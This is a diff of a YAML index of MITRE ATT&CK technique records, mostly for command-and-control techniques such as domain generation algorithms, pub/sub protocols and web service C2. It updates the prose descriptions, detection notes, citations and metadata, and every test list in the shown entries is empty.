-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -36811,14 +37239,12 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 command-and-control:
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -36881,7 +37307,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1132.001:
     technique:
@@ -36939,97 +37364,95 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1132.001
     atomic_tests: []
   T1568.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T15:55:16.111Z'
+      name: Domain Generation Algorithms
+      description: |-
+        Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
+
+        DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
+
+        Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
       x_mitre_contributors:
       - Ryan Benson, Exabeam
       - Barry Shteiman, Exabeam
       - Sylvain Gil, Exabeam
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+        Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
       type: attack-pattern
+      id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
       created: '2020-03-10T17:44:59.787Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1568.002
         url: https://attack.mitre.org/techniques/T1568/002
-      - source_name: Cybereason Dissecting DGAs
-        url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
-        description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
-          Eight Real World DGA Variants. Retrieved February 18, 2019.'
-      - source_name: Cisco Umbrella DGA
-        url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
-        description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
-          Why so effective?. Retrieved February 18, 2019.
-      - source_name: Unit 42 DGA Feb 2019
-        url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
-        description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
-          Generation Algorithms (DGA). Retrieved February 19, 2019.'
-      - url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+        external_id: T1568.002
+      - source_name: Elastic Predicting DGA
+        description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
+          2). Predicting Domain Generation Algorithms with Long Short-Term Memory
+          Networks. Retrieved April 26, 2019.
+        url: https://arxiv.org/pdf/1611.00791.pdf
+      - source_name: Talos CCleanup 2017
         description: 'Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast
           Number of Machines at Risk. Retrieved March 9, 2018.'
-        source_name: Talos CCleanup 2017
-      - source_name: Akamai DGA Mitigation
-        url: https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
-        description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
-          Domain Generation Algorithms. Retrieved February 18, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
+        url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+      - source_name: Pace University Detecting DGA May 2017
+        description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
+          Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
+          April 26, 2019.
+        url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
+      - source_name: FireEye POSHSPY April 2017
         description: Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless
           WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
-        source_name: FireEye POSHSPY April 2017
+        url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
       - source_name: ESET Sednit 2017 Activity
-        url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
         description: 'ESET. (2017, December 21). Sednit update: How Fancy Bear Spent
           the Year. Retrieved February 18, 2019.'
+        url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
       - source_name: Data Driven Security DGA
-        url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
         description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
           2, Feature Engineering. Retrieved February 18, 2019.'
-      - source_name: Pace University Detecting DGA May 2017
-        url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
-        description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
-          Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
-          April 26, 2019.
-      - source_name: Elastic Predicting DGA
-        url: https://arxiv.org/pdf/1611.00791.pdf
-        description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
-          2). Predicting Domain Generation Algorithms with Long Short-Term Memory
-          Networks. Retrieved April 26, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
-      name: Domain Generation Algorithms
-      description: |-
-        Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
-
-        DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
-
-        Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: command-and-control
-      x_mitre_detection: |-
-        Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
-        Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
-      x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
+        url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
+      - source_name: Akamai DGA Mitigation
+        description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
+          Domain Generation Algorithms. Retrieved February 18, 2019.
+        url: https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
+      - source_name: Cisco Umbrella DGA
+        description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
+          Why so effective?. Retrieved February 18, 2019.
+        url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
+      - source_name: Cybereason Dissecting DGAs
+        description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
+          Eight Real World DGA Variants. Retrieved February 18, 2019.'
+        url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
+      - source_name: Unit 42 DGA Feb 2019
+        description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
+          Generation Algorithms (DGA). Retrieved February 19, 2019.'
+        url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Network Traffic: Network Traffic Flow'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.004:
     technique:
@@ -37095,9 +37518,67 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071.004
     atomic_tests: []
+  T1071.005:
+    technique:
+      modified: '2024-10-16T13:08:35.629Z'
+      name: Publish/Subscribe Protocols
+      description: "Adversaries may communicate using publish/subscribe (pub/sub)
+        application layer protocols to avoid detection/network filtering by blending
+        in with existing traffic. Commands to the remote system, and often the results
+        of those commands, will be embedded within the protocol traffic between the
+        client and server. \n\nProtocols such as <code>MQTT</code>, <code>XMPP</code>,
+        <code>AMQP</code>, and <code>STOMP</code> use a publish/subscribe design,
+        with message distribution managed by a centralized broker.(Citation: wailing
+        crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their
+        messages by topics, while subscribers receive messages according to their
+        subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse
+        publish/subscribe protocols to communicate with systems under their control
+        from behind a message broker while also mimicking normal, expected traffic."
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
+      x_mitre_contributors:
+      - Domenico Mazzaferro Palmeri
+      - Sofia Sanchez Margolles
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
+      - 'Network Traffic: Network Traffic Content'
+      type: attack-pattern
+      id: attack-pattern--241f9ea8-f6ae-4f38-92f5-cef5b7e539dd
+      created: '2024-08-28T14:14:18.512Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1071/005
+        external_id: T1071.005
+      - source_name: wailing crab sub/pub
+        description: Hammond, Charlotte. Villadsen, Ole. Metrick, Kat.. (2023, November
+          21). Stealthy WailingCrab Malware misuses MQTT Messaging Protocol. Retrieved
+          August 28, 2024.
+        url: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
+      - source_name: Mandiant APT1 Appendix
+        description: Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal.
+          Retrieved July 18, 2016.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1573.001:
     technique:
       modified: '2023-12-26T20:58:19.356Z'
@@ -37143,7 +37624,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1568.001:
     technique:
@@ -37175,7 +37655,7 @@ command-and-control:
         url: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
         description: 'Albors, Josep. (2017, January 12). Fast Flux networks: What
           are they and how do they work?. Retrieved March 11, 2020.'
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T16:10:37.183Z'
       name: Fast Flux DNS
       description: |-
         Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
@@ -37197,22 +37677,20 @@ command-and-control:
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071:
     technique:
-      modified: '2024-01-17T22:52:23.454Z'
+      modified: '2024-08-28T14:10:33.145Z'
       name: Application Layer Protocol
       description: "Adversaries may communicate using OSI application layer protocols
         to avoid detection/network filtering by blending in with existing traffic.
         Commands to the remote system, and often the results of those commands, will
         be embedded within the protocol traffic between the client and server. \n\nAdversaries
         may utilize many different protocols, including those used for web browsing,
-        transferring files, electronic mail, or DNS. For connections that occur internally
-        within an enclave (such as those between a proxy or pivot node and other nodes),
-        commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye
-        Spy Email Nov 22) "
+        transferring files, electronic mail, DNS, or publishing/subscribing. For connections
+        that occur internally within an enclave (such as those between a proxy or
+        pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation:
+        Mandiant APT29 Eye Spy Email Nov 22) "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -37234,7 +37712,7 @@ command-and-control:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -37259,7 +37737,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071
     atomic_tests: []
   T1219:
@@ -37343,7 +37820,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1219
     atomic_tests: []
   T1659:
@@ -37407,11 +37883,10 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -37495,7 +37970,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1572:
     technique:
@@ -37526,7 +38000,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T17:15:35.372Z'
       name: Protocol Tunneling
       description: "Adversaries may tunnel network communications to and from a victim
         system within a separate protocol to avoid detection/network filtering and/or
@@ -37546,8 +38020,8 @@ command-and-control:
         encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua
         JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)
         in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or
-        [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to
-        further conceal C2 communications and infrastructure. "
+        [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)
+        to further conceal C2 communications and infrastructure. "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -37569,8 +38043,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1572
     atomic_tests: []
   T1071.003:
@@ -37632,7 +38104,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1092:
     technique:
@@ -37680,7 +38151,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1090.002:
     technique:
@@ -37734,7 +38204,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1090:
     technique:
@@ -37767,7 +38236,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T19:16:11.648Z'
       name: Proxy
       description: |-
         Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
@@ -37787,8 +38256,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1568:
     technique:
@@ -37826,7 +38293,7 @@ command-and-control:
         url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
         description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
           2, Feature Engineering. Retrieved February 18, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:26:23.782Z'
       name: Dynamic Resolution
       description: |-
         Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
@@ -37854,42 +38321,22 @@ command-and-control:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1102:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Anastasios Pingios
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
-      type: attack-pattern
-      created: '2017-05-31T21:31:13.915Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1102
-        url: https://attack.mitre.org/techniques/T1102
-      - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
-        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
-          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
-        source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-07T17:53:54.380Z'
       name: Web Service
       description: |-
-        Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+        Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
 
         Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_contributors:
+      - Anastasios Pingios
+      - Sarathkumar Rajendran, Microsoft Defender365
+      x_mitre_deprecated: false
       x_mitre_detection: 'Host data that can relate unknown or suspicious process
         activity using a network connection is important to supplement any existing
         indicators of compromise based on malware command and control signatures and
@@ -37898,17 +38345,39 @@ command-and-control:
         for uncommon data flows (e.g., a client sending significantly more data than
         it receives from a server). User behavior monitoring may help to detect abnormal
         patterns of activity.(Citation: University of Birmingham C2)'
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_permissions_required:
-      - User
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+      created: '2017-05-31T21:31:13.915Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1102
+        external_id: T1102
+      - source_name: Broadcom BirdyClient Microsoft Graph API 2024
+        description: Broadcom. (2024, May 2). BirdyClient malware leverages Microsoft
+          Graph API for C&C communication. Retrieved July 1, 2024.
+        url: https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication
+      - source_name: University of Birmingham C2
+        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1568.003:
     technique:
@@ -37940,7 +38409,7 @@ command-and-control:
         description: Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage
           Operations. Retrieved March 6, 2017.
         url: https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T20:54:28.287Z'
       name: DNS Calculation
       description: |-
         Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
@@ -37957,8 +38426,6 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1104:
     technique:
@@ -37978,7 +38445,7 @@ command-and-control:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1104
         external_id: T1104
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:43:38.181Z'
       name: Multi-Stage Channels
       description: |-
         Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
@@ -38001,8 +38468,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
